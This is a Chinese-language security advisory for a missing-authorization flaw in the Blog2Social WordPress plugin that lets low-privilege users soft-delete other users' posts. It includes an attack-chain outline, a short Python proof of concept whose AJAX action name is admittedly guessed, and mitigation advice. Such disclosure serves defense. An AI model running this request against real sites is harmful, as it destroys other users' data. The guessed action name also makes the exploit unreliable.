CVE-2026-7051 Blog2Social插件越权删除漏洞

漏洞信息

漏洞编号

CVE-2026-7051

漏洞类型

越权漏洞

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Blog2Social: Social Media Auto Post & Scheduler

漏洞概述

WordPress插件Blog2Social在8.9.0及之前版本存在缺失授权漏洞。由于`B2S_Post_Tools::deleteUserPublishPost()`和`deleteUserSchedPost()`函数未验证用户所有权，且数据库查询缺少`blog_user_id`约束，导致经过身份验证的攻击者可通过发送特定请求，利用`postId`参数软删除任意用户的B2S发布或计划发布记录，破坏内容发布工作流。

技术细节

该漏洞源于Blog2Social插件中处理删除操作的代码逻辑缺陷。具体而言，在`includes/B2S/Post/Tools.php`文件中的`deleteUserPublishPost`和`deleteUserSchedPost`方法负责删除已发布或计划发布的社交媒体帖子。然而，这两个函数在执行删除SQL语句时，仅依据传入的`postId`（对应数据库表`wp_b2s_posts`的主键ID）进行操作，未在WHERE子句中添加对当前登录用户ID（即`blog_user_id`）的校验。这意味着，只要攻击者拥有WordPress账号（即使是低权限订阅者），就可以通过枚举或猜测ID，构造包含任意`postId`的AJAX请求发送给服务器。服务器接收请求后，会错误地执行删除操作，从而导致属于其他用户的帖子记录被软删除，造成数据丢失和工作流中断。此漏洞属于典型的IDOR（不安全的直接对象引用）类型，攻击者无需目标用户的高权限凭证即可破坏系统数据的完整性与可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标站点安装了Blog2Social插件，且版本低于或等于8.9.0。

STEP 2

2. 获取凭证

攻击者注册或获取一个低权限的WordPress账户（如订阅者），以满足认证要求（PR:L）。

STEP 3

3. 构造利用包

攻击者构造一个POST请求发送至`/wp-admin/admin-ajax.php`，包含恶意参数（如`action=b2s_delete_user_post`和`postId=目标ID`）。

STEP 4

4. 执行攻击

攻击者使用低权限账户的Cookie发送请求。服务器因未校验`postId`的所有权，直接执行删除操作。

STEP 5

5. 达成效果

目标用户的已发布或计划发布的社交媒体帖子的记录被软删除，导致工作流中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: Blog2Social < 8.9.0 - Missing Authorization to Arbitrary Post Deletion
# Date: 2026-05-13
# Exploit Author: Analyst
# Vendor Homepage: https://blog2social.com
# Software Link: https://wordpress.org/plugins/blog2social/
# Version: <= 8.9.0
# CVE: CVE-2026-7051

import requests

def exploit(target_url, cookie, post_id):
    """
    Attempts to delete a specific post ID by exploiting the missing authorization vulnerability.
    """
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # The action parameter typically maps to the function name or a registered hook.
    # Based on the vulnerable function names (deleteUserPublishPost, deleteUserSchedPost),
    # the action might be 'b2s_delete_user_post' or similar.
    payload = {
        "action": "b2s_delete_user_post",  # Verify actual action name via source code
        "postId": str(post_id)
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    
    # The 'wordpress_logged_in_' cookie is required for authentication (PR:L)
    cookies = {
        "wordpress_logged_in_hash": cookie 
    }
    
    try:
        response = requests.post(ajax_url, data=payload, headers=headers, cookies=cookies)
        if response.status_code == 200:
            print(f"[+] Request sent to delete post ID {post_id}.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

# Usage Example
# target = "http://localhost"
# user_cookie = "attacker_session_cookie_value"
# target_post_id = 5
# exploit(target, user_cookie, target_post_id)

影响范围

Blog2Social: Social Media Auto Post & Scheduler <= 8.9.0

防御指南

临时缓解措施

建议立即将Blog2Social插件升级至最新版本。如果无法立即升级，应暂时禁用该插件，或者配置Web应用防火墙（WAF）规则，拦截对特定AJAX端点的未授权删除请求。此外，管理员应审查用户权限，确保仅受信任用户具有发布内容的权限。